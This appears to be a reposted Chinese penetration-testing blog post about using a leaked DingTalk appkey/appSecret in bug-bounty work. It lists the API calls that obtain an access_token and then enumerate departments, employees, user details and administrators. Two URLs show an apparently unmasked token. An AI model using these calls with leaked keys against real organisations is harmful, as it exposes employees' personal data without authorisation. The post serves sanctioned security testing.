前言
前段时间在某众测项目中发现了一对钉钉的AK/SK,以前常见的都是微信和微博的,第一次遇到钉钉的,查阅官方API文档后记录一下方便师傅们遇到的时候利用。
正文
发现的AK/SK如下
其中利用的为appkey和appSecret,钉钉的认证接口为企业内部应用权限
,官方API地址为
https://open.dingtalk.com/document/orgapp/obtain-orgapp-token
所有服务都可在上述地址中查看调用文档,下面直接演示各个接口的调用过程
获取access_token
https://oapi.dingtalk.com/gettoken?appkey=dingv****************j&appsecret=UXHf***************************************XNu1
可以看到返回结果主要为token和有效期(2小时),然后获取企业部门列表
api1: https://oapi.dingtalk.com/department/list?access_token=8a5********************013
api2(新版): https://oapi.dingtalk.com/topapi/v2/department/listsub?access_token=8a5********************013
获取子部门ID列表
https://oapi.dingtalk.com/topapi/v2/department/listsubid?access_token=8a5********************013&dept_id=1
获取部门用户基础信息
旧版api: https://oapi.dingtalk.com/user/simplelist?access_token=8a5********************013&department_id=1
新版api: https://oapi.dingtalk.com/topapi/user/listsimple?access_token=8a5********************013&dept_id=1&cursor=0&size=100
获取部门用户详情
https://oapi.dingtalk.com/topapi/v2/user/list?access_token=8a5********************013&cursor=0&contain_access_limit=false&size=10&order_field=modify_desc&language=zh_CN&dept_id=10
获取管理员列表
https://oapi.dingtalk.com/topapi/user/listadmin?access_token=8a5cb0096a4233c09157f3b35381d013
sys_level表示管理员等级,2代表子管理员,1代表主管理员
获取员工人数
https://oapi.dingtalk.com/topapi/user/count?access_token=8a5cb0096a4233c09157f3b35381d013&only_active=false
only_active为是否包含未激活钉钉人数,false为包含未激活钉钉的人员数量,true为只包含激活钉钉的人员数量
查询用户详情
旧版api: https://oapi.dingtalk.com/user/get?access_token=8a5********************013&userid=1
新版api: https://oapi.dingtalk.com/topapi/v2/user/get?access_token=8a5********************013&userid=1
结语
以上接口为常用的服务接口,这些接口在众测挖掘中已经足够证明危害,更多接口还请师傅们查看官方文档调用,像创建用户等增、删、改的操作一般也都没权限,真实项目中一般也不会允许使用这些操作。希望本篇文章能够帮助师傅们在项目中快速利用节省时间,有不足的地方也请多多指正。
原文始发于微信公众号(零壹安全):渗透测试之钉钉AK/SK接口调用
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论